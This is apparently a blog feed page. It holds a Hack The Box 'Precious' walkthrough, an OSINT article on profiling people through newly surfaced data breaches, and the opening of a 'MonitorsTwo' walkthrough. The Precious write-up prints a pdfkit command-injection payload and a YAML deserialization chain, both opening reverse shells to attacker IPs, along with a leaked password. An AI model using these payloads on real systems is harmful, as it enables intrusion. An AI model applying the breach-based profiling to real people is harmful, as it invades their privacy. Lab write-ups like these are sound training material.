HTB Precious Walkthrough

/in

HTB Precious Walkthrough

A really simple BOX to start gaining experience!

The nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-11 14:57 EST
Nmap scan report for 10.10.11.189
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.24 seconds

Of course, the only access point is the HTTP on port 80; insert the precious.htb domain in the /etc/hosts file and proceed.

HTB Precious Walkthrough

The portal seems to be a straightforward converter of Web pages to PDF. In addition to having a single access point, the feature leaves no doubt about the attack to be carried out, you just need to identify the exact tool used for the conversion and understand what kind of vulnerability it suffers from. By being able to enter a URL in the only available text field, the vulnerability could be hidden in the URL itself or in the page to be converted (the payload). We, therefore, verify that the BOX reaches us and that we can pass a personal payload; we start a native php server and insert our address in the form field.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.189 - Precious (lin)/attack]
└─$ php -S 10.10.14.79:5000 
[Sun Dec 11 15:07:49 2022] PHP 8.1.12 Development Server (http://10.10.14.79:5000) started
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 Accepted
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 [404]: GET / - No such file or directory
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 Closing

The 404 error code, however, does not start the conversion, so I prepared an empty html page, downloaded the output of the operation, and looked inside, looking for information concerning the tool used for the conversion.

%PDF-1.4
%âã
1 0 obj
<<
/Title ()
/Creator (��wkhtmltopdf 0.12.6)
/Producer (��Qt 5.15.2)
/CreationDate (D:20221211153322-05'00')
[...]
1037 
%%EOF
%BeginExifToolUpdate
1 0 obj
<<
/Creator (Generated by pdfkit v0.8.6)
>>
endobj
11 0 obj
[...]

I was a bit confused. Inside the file there seem to be indications about two different conversion tools: wkhtmltopdf and pdfkit. They’re both conversion tools, but I didn’t understand why they’re both being repurposed. However, the exiftool seems to identify the pdfkit in the metadata.

┌──(in7rud3r㉿kali-muletto)-[~/Downloads]
└─$ exiftool 9y7vtnuzxwr6isk3hdttvuy8fng2kxrx.pdf 
ExifTool Version Number         : 12.51
File Name                       : 9y7vtnuzxwr6isk3hdttvuy8fng2kxrx.pdf
Directory                       : .
File Size                       : 4.6 kB
File Modification Date/Time     : 2022:12:11 15:37:29-05:00
File Access Date/Time           : 2022:12:11 15:38:06-05:00
File Inode Change Date/Time     : 2022:12:11 15:37:29-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

In order not to leave anything to chance, however, let’s also take a look at the first one. Looking for exploits for the first tool, something comes up, but it doesn’t seem to work despite multiple attempts.

NVD – CVE-2022-35583
HTB Precious WalkthroughNational Institute of Standards and Technology logo
HTB Precious Walkthrough

Convinced that it is still the second tool that is really the object of the challenge, I want to look for exploits for this second one.

CVE-2022-25765 – GitHub Advisory Database
PDFKit vulnerable to Command Injection
HTB Precious WalkthroughGitHub
HTB Precious Walkthrough

A nice list.

Snyk Vulnerability Database | Snyk
High severity (7.3) Command Injection in pdfkit | CVE-2022-25765
HTB Precious WalkthroughLearn more about RubyGems with Snyk Open Source Vulnerability Database
HTB Precious Walkthrough

And that looked really interesting. I immediately tried with the verification payload shown in the example, which gave me good results. Sleep seems to have been performed before the conversion process and the pdf is returned to me after the 15 seconds indicated, increasing the time of the command also increases the interval before the download starts.

http://10.10.14.14:5000/file.html?name=#{'%20`sleep 15`'}

We should have identified the vulnerability. Now, let’s see how to use it. The second example payload also provides useful information, and the commands interpreted by the converter are reported as processed data in the URL addressed to my php server.

[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 Accepted
[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 [200]: GET /file.html?pwd=/var/www/pdfapp&user=ruby
[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 Closing

All we have to do is insist on this path, and try to recover as much information as possible and perhaps take advantage of the execution of commands via injection of the payload into the URLs. Despite my attempts, I still couldn’t recover the data in the most common files, so I decided to look for a more specific payload for this attack that allowed me to exploit an RCE, and I found it easily.

CVE-2022-25765-pdfkit-Exploit-Reverse-Shell | CTF导航
CVE-2022-25765-pdfkit-Exploit-Reverse-Shell pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tes…
HTB Precious WalkthroughCTF导航4986文章
HTB Precious Walkthrough

Of course, I refined the attack and identified the payload that fits my scenario.

http://10.10.14.14:5000/file.html?name={%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.14",4444))')`}

Perfect, despite having obtained a reverse shell on the machine, it seems that my user does not own the user flag, let alone have permission to read it.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.189] 46478
whoami
ruby
pwd
/var/www/pdfapp
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26 08:28 .
drwxr-xr-x 4 root root 4096 Oct 26 08:28 ..
drwxr-xr-x 4 root ruby 4096 Oct 26 08:28 app
drwxr-xr-x 2 root ruby 4096 Oct 26 08:28 config
-rw-r--r-- 1 root ruby   59 Sep 10 09:46 config.ru
-rw-r--r-- 1 root ruby   99 Sep 17 14:17 Gemfile
-rw-r--r-- 1 root ruby  478 Sep 26 05:04 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 12 16:34 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26 08:28 public
ls -la /home/
total 16
drwxr-xr-x  4 root  root  4096 Oct 26 08:28 .
drwxr-xr-x 18 root  root  4096 Nov 21 15:11 ..
drwxr-xr-x  3 henry henry 4096 Dec 12 13:29 henry
drwxr-xr-x  4 ruby  ruby  4096 Dec 12 13:15 ruby
ls -la /home/ruby/
total 28
drwxr-xr-x 4 ruby ruby 4096 Dec 12 13:15 .
drwxr-xr-x 4 root root 4096 Oct 26 08:28 ..
lrwxrwxrwx 1 root root    9 Oct 26 07:53 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26 08:28 .bundle
drwxr-xr-x 4 ruby ruby 4096 Dec 12 15:33 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile
ls -la /home/henry/
total 32
drwxr-xr-x 3 henry henry 4096 Dec 12 13:29 .
drwxr-xr-x 4 root  root  4096 Oct 26 08:28 ..
lrwxrwxrwx 1 root  root     9 Sep 26 05:04 .bash_history -> /dev/null
-rw-r--r-- 1 henry henry  220 Sep 26 04:40 .bash_logout
-rw-r--r-- 1 henry henry 3526 Sep 26 04:40 .bashrc
-rw-r--r-- 1 henry henry  617 Dec 12 13:29 dependencies.yml
drwxr-xr-x 3 henry henry 4096 Dec 12 13:21 .local
-rw-r--r-- 1 henry henry  807 Sep 26 04:40 .profile
-rw-r----- 1 root  henry   33 Dec 12 13:14 user.txt
cat /home/henry/user.txt
cat: /home/henry/user.txt: Permission denied

I’m not there to rehash it. I tried to start a session of linpeas.

[...]
╔══════════╣ CVEs Check
Potentially Vulnerable to CVE-2022-0847                                                                                                                                                                  

Potentially Vulnerable to CVE-2022-2588
[...]
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                                       
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops                                                                                                                                           

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
[...]
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                            
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                                                                                                                        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:45983         0.0.0.0:*               LISTEN      798/Passenger RubyA 
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
[...]
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 root root 20086720 Dec 12 16:45 /var/log/nginx/access.log                                                                                                                                   

-rw-r----- 1 www-data adm 0 Dec 12 13:14 /var/log/nginx/error.log
[...]
                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                                                                      
                               ╚═══════════════════╝                                                                                                                                                     
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
strace Not Found                                                                                                                                                                                         
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20                                                                                                                               
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 20  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 179K Feb 27  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 1.2M Mar 27  2022 /usr/bin/bash
-rwsr-xr-x 1 root root 71K Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 55K Jan 20  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Feb 26  2021 /usr/bin/fusermount
-rwsr-xr-- 1 root messagebus 51K Oct  5 07:04 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 471K Jul  1 18:37 /usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
-rwxr-sr-x 1 root ssh 347K Jul  1 18:37 /usr/bin/ssh-agent                                                                                                                                               
-rwxr-sr-x 1 root crontab 43K Feb 22  2021 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K Feb  7  2020 /usr/bin/expiry
-rwxr-sr-x 1 root tty 35K Jan 20  2022 /usr/bin/wall
-rwxr-sr-x 1 root shadow 79K Feb  7  2020 /usr/bin/chage
-rwxr-sr-x 1 root shadow 38K Aug 26  2021 /usr/sbin/unix_chkpwd
[...]
/home/ruby/.bundle
/home/ruby/.bundle/config
[...]

Apparently, there’s a lot of stuff to check, but once you start getting familiar with HTB machines, you also start to understand that, in most cases, the CVEs suggested by the tool aren’t the solution. Leaving those aside and taking a quick look at the other clues, I’m immediately attracted to the .bundle folder (and the configuration file it contains), which is located in the home of the user I’m connected to.

cat .bundle/config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

I told you it would be a simple BOX. Inside the file, I found credentials that seem to belong to the user who owns the flag. Fooled by the fact that the BOX is starting to look a little too simple, I try to identify the password encryption algorithm with the hashcat… but that doesn’t bring up anything. Almost disappointed and incredulous of what is going through my head, I tried to connect in ssh using the password as if it were unencrypted.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.189 - Precious (lin)/attack/hc]
└─$ ssh henry@10.10.11.189
The authenticity of host '10.10.11.189 (10.10.11.189)' can't be established.
ED25519 key fingerprint is SHA256:1WpIxI8qwKmYSRdGtCjweUByFzcn0MSpKgv+AwWRLkU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.189' (ED25519) to the list of known hosts.
henry@10.10.11.189's password: 
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 12 13:42:09 2022 from 10.10.14.53
-bash-5.1$ cat user.txt 
c******************************a

I admit I don’t know what that .bundle folder is, but after what I’ve seen, I don’t even want to investigate that much.

Ready to proceed in the most difficult roads towards the root flag. I checked what I can launch as root without password. I’m sure I won’t be able to execute…

-bash-5.1$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

…OK, forget it.

-bash-5.1$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

It appears to be a Ruby script that verifies the versions of the packages listed in a yaml file against the versions available from the official repositories. The yaml file is really very simple.

henry@precious:~$ find / -name "dependencies.yml" 2>/dev/null
/opt/sample/dependencies.yml
henry@precious:~$ cat /opt/sample/dependencies.yml
yaml: 0.1.1
pdfkit: 0.8.6

The first approach, looking for file replacements and user path overrides to trick the script, leads me to no particular idea. However, the yaml is a structure that can also contain information related to the execution of code or command, references to files, and so on. I tried to take advantage of the Load command of the YAML package used in the script. Searching on the Internet, I found something interesting.

Blind Remote Code Execution through YAML Deserialization
While performing an application security assessment on a Ruby on Rails project,
I discovered upload functionality that allowed users to upload text, CSV, and
YAML files. The latter option interested me because reading online suggested
YAML deserialization could be a potential vector. After a few up…
HTB Precious WalkthroughStratum Security BlogColin McQueen
HTB Precious Walkthrough

Perfect, I prepare my payload…

henry@precious:/tmp/rbe$ cat dependencies.yml 
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/10.10.14.106/4444 0>&1'"
         method_id: :resolve

I ran the script as administrator…

henry@precious:/tmp/rbe$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found

…and here is my root shell, which allows me to retrieve the root flag.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.106] from (UNKNOWN) [10.10.11.189] 54934
root@precious:/tmp/rbe# whoami
whoami
root
root@precious:/tmp/rbe# cat /root/root.txt
cat /root/root.txt
5******************************2
root@precious:/tmp/rbe# ^C

This is a nice BOX to start with. That’s all, folks. Have fun hacking activities (legally, as always), and see you in the next BOX.

Secjuice – ​Read More

Using Newly Surfaced Data Breaches for OSINT Research

/in

Using Newly Surfaced Data Breaches for OSINT Research

Data breaches are an unfortunate reality for many websites, leading to leaked information often posted on dark web forums or discovered by security researchers. Before this data disappears or is removed, Data Breach Search Engines (DBSEs) gather, verify, and categorize it, making it accessible to people seeking to understand what information may have been compromised. DBSEs like Have I Been Pwned allow OSINT (open-source intelligence) investigators to enter an email address and see if it was used on a breached site, often revealing critical information about the target’s online footprint. These DBSEs serve as an important privacy service, allowing users to know if their information has been exposed and, in some cases, request its removal from these databases.

What are Data Breach Search Engines?

DBSEs provide a way to find out where an email address, phone number, username, or other identifier has been used, giving researchers a clearer sense of a person’s digital presence. If a DBSE search shows that an email was compromised in a LinkedIn breach, for example, an investigator knows the person likely had a LinkedIn account. This information is invaluable for OSINT researchers, as it offers hints about a target’s professional network, social media presence, and even connections to colleagues or alternate emails. Some of the most popular DBSEs include Have I Been Pwned (searchable by email or phone), IntelX.io (email), and dehashed.com (email, username, domain, password, IP). There are also more specific breach-focused tools, such as haveibeenzucked.com for Facebook data and checkashleymadison.com for the Ashley Madison breach. These tools maintain deep web databases, and the information within them can often be accessed only through the website itself. For OSINT investigators, understanding DBSE resources is critical, as each can reveal unique details about where an email address, phone number, or other identifier was registered and whether it has been compromised.

Data Breaches Now Available on Data Breach Information Sites

This month, four major data breaches have appeared on platforms like Have I Been Pwned, each offering unique insights into different user communities. Although some breaches occurred years ago, the data is newly available on DBSEs, presenting OSINT researchers with new avenues to explore.

1. Internet Archive (October 2024)

In October 2024, the Internet Archive, famous for its digital preservation efforts and the Wayback Machine, experienced a breach affecting 31 million user accounts. Data exposed includes email addresses, screen names, and bcrypt-hashed passwords. The Internet Archive responded to the breach quickly and transparently, immediately implementing security measures, disabling compromised libraries, and restoring service in read-only mode while the organization strengthened its defenses. This breach is notable for OSINT researchers interested in online archives and historical data access, as it suggests users engaged in digital research or preservation activities.

2. VimeWorld (October 2018)

VimeWorld, a Russian Minecraft service, experienced a data breach in 2018 that exposed data on 3.1 million users. The compromised information includes usernames, email addresses, IP addresses, and hashed passwords (MD5 or bcrypt). This breach’s recent availability in DBSEs presents new opportunities for researchers interested in gaming communities, particularly among Russian-speaking audiences.

3. StreamCraft (July 2020)

The StreamCraft breach in July 2020 affected 1.8 million records, exposing usernames, email addresses, IP addresses, and hashed passwords (MD5 or bcrypt). StreamCraft data, newly accessible for OSINT purposes, provides a look into the online behavior of gaming communities, especially among users who favor multiplayer gaming.

4. AlpineReplay (2019)

The 2019 breach of AlpineReplay, a fitness-tracking app later integrated into Trace, exposed 900,000 records, including email addresses, usernames, dates of birth, gender, weight, and passwords hashed with MD5 or bcrypt. Recently appearing in DBSEs, this data gives insights into the interests of fitness enthusiasts, particularly those who use digital tools to track performance in sports like skiing and snowboarding.

Why These Data Breaches Matter to Researchers

When an OSINT researcher finds an email address in one of these breaches, it can reveal valuable information about the target’s digital activities. Each platform represents a specific online community or interest, giving clues about an individual’s preferences, affiliations, or lifestyle.

• Internet Archive: If someone’s data is in the Internet Archive breach, it might indicate an interest in digital preservation, academic research, or access to open-source content. This can suggest a background in academia or a strong interest in historical records.

• VimeWorld and StreamCraft: The presence of someone’s account in these gaming-related breaches points to involvement in online gaming, possibly within Russian-speaking or international communities. This can help an investigator understand the target’s recreational interests and engagement in gaming culture.

• AlpineReplay: An account in the AlpineReplay breach implies an interest in fitness, specifically in winter sports like skiing and snowboarding. The individual is likely health-conscious and inclined toward tracking their performance, providing insights into their lifestyle and personal values.

Simply knowing that a target’s email address is associated with one of these platforms can reveal a lot about them. However, OSINT researchers should approach this data cautiously. While these accounts provide contextual information, they don’t give a complete picture of a person’s behavior or habits, so researchers should use this information as a starting point rather than a conclusive profile.

Detailed Look at the Internet Archive Data Breach

The October 2024 Internet Archive breach involved the exposure of data from around 31 million user accounts. This breach, linked to a compromised GitLab token, allowed attackers to access development servers, revealing email addresses, screen names, and bcrypt-hashed passwords. The first breach occurred on October 9, with attackers exploiting a GitLab configuration file on the Internet Archive’s servers that contained an exposed authentication token. This gave them access to the source code, credentials, and, ultimately, the database management system, where they downloaded user data and modified site elements. Reports suggest this token had been accessible since December 2022, giving attackers a prolonged opportunity to exploit it. On October 20, a second breach occurred, this time exploiting unrotated Zendesk API tokens to access user support tickets. During this period, hackers defaced the Internet Archive’s website using JavaScript alerts and launched DDoS attacks attributed to the hacker group SN_BlackMeta. In response, the Internet Archive implemented security measures, scrubbed compromised systems, and temporarily operated in a read-only mode before restoring full access. This quick and transparent response from the Internet Archive emphasized the organization’s commitment to user security.

An additional OSINT trick is available for researchers using the Internet Archive. By using the search function on the top right corner of the Internet Archive’s website, investigators can enter an email address associated with a target’s account to see if an account exists. Although the email address itself isn’t publicly identified in the profile, the search function will still locate the account, providing access to profile information and showing data and websites archived by the user. This technique can be particularly useful for tracing interests, historical engagements, and online behavior through the Internet Archive.

Founder Brewster Kahle reported that the organization is reinforcing its defenses and emphasized the Internet Archive’s commitment to secure its platform. For OSINT researchers, this breach provides a unique opportunity to explore user demographics and interests in digital archives, though it demands careful handling to avoid further privacy violations.

Citations

1. Internet Archive (Archive.org) Hacked for Second Time in a Month

URL: https://hackread.com/internet-archive-archive-org-hacked-for-second-time/

2. Internet Archive hacked, data breach impacts 31 million users

URL: https://www.bleepingcomputer.com/news/security/internet-archive-hacked-data-breach-impacts-31-million-users/

3. Hackers Claim ‘Catastrophic’ Internet Archive Attack – Newsweek

URL: https://www.newsweek.com/catastrophic-internet-archive-hack-hits-31-million-people-1966866

4. Internet Archive Breach Exposes 31 Million Users – WIRED

URL: https://www.wired.com/story/internet-archive-hacked/

5. The Internet Archive is finally mostly back online after a series of cyberattacks

URL: https://www.zdnet.com/article/the-internet-archive-is-finally-mostly-back-online-after-a-series-of-cyberattacks/

6. Internet Archive hacker claims to still have access, responds to Zendesk support tickets

URL: https://therecord.media/internet-archive-alleged-zendesk-account-breach

7. Hackers exploited GitLab tokens for Internet Archive breach

URL: https://www.breechingcomputer.com/news/security/internet-archive-breached-again-through-stolen-access-tokens

8. Hackers steal information from 31 million Internet Archive users

URL: https://www.npr.org/2024/10/20/nx-s1-5159000/internet-archive-hack-leak-wayback-machine

Secjuice – ​Read More

HTB MonitorsTwo Walkthrough

/in

HTB MonitorsTwo Walkthrough

Not a bad BOX, the foothold towards the user flag is interesting, but privileges escalation to root is a little less convincing. Let’s begin.

The nmap scan.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-14 15:26 EDT
Nmap scan report for 10.10.11.211
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.82 seconds

As usual, we start from a portal; I don’t see any indications of particular domain names, so we proceed in the more traditional way, browsing the portal by IP address.

HTB MonitorsTwo Walkthrough

Wow, really nice! :D

HTB MonitorsTwo Walkthrough

And some more information via the wappalyzer.

Cacti® – The Complete RRDTool-based Graphing Solution
HTB MonitorsTwo WalkthroughCacti®
HTB MonitorsTwo Walkthrough

From the news box, the Cacti 1.2.24 was released on Feb 27, 2023!
Anyway, searching for some exploit about it…

Cacti v1.2.22 – Remote Command Execution (RCE)
Cacti v1.2.22 – Remote Command Execution (RCE). CVE-2022-46169 . webapps exploit for PHP platform
HTB MonitorsTwo WalkthroughExploit DatabaseRiadh Bouchahoua
HTB MonitorsTwo Walkthrough

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ wget https://www.exploit-db.com/download/51166                                             
--2023-05-14 15:52:02--  https://www.exploit-db.com/download/51166
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2864 (2.8K) [application/txt]
Saving to: ‘51166’

51166                                              100%[=============================================================================================================>]   2.80K  --.-KB/s    in 0s      

2023-05-14 15:52:03 (32.5 MB/s) - ‘51166’ saved [2864/2864]

                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ mv 51166 51166.py
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ ls -la
total 12
drwxr-xr-x 2 in7rud3r in7rud3r 4096 May 14 15:52 .
drwxr-xr-x 3 in7rud3r in7rud3r 4096 May 14 15:51 ..
-rw-r--r-- 1 in7rud3r in7rud3r 2864 May 14 15:52 51166.py
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ python3 51166.py                                            
usage: 51166.py [-h] [-u URL] -p REMOTE_PORT -i REMOTE_IP
51166.py: error: the following arguments are required: -p/--remote_port, -i/--remote_ip

The script doesn’t seem to work, failing. I tried to reproduce the injection manually, but I get an “unauthorized” message, even though the returned http code is 200.
Let’s go ahead. Another link seems to suggest that there is a module on the metasploit framework.

Cacti 1.2.22 unauthenticated command injection
Rapid7’s VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.
HTB MonitorsTwo WalkthroughRapid7
HTB MonitorsTwo Walkthrough

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.211 - MonitorsTwo (lin)/attack/expl]
└─$ msfconsole       
                                                  
     ,           ,
    /                                                                                                                                                                                                   
   ((__---,,,---__))                                                                                                                                                                                     
      (_) O O (_)_________                                                                                                                                                                               
          _ /            |                                                                                                                                                                             
          o_o    M S F   |                                                                                                                                                                             
                  _____  |  *                                                                                                                                                                           
                |||   WW|||                                                                                                                                                                              
                |||     |||                                                                                                                                                                              
                                                                                                                                                                                                         

       =[ metasploit v6.3.14-dev                          ]
+ -- --=[ 2311 exploits - 1206 auxiliary - 412 post       ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

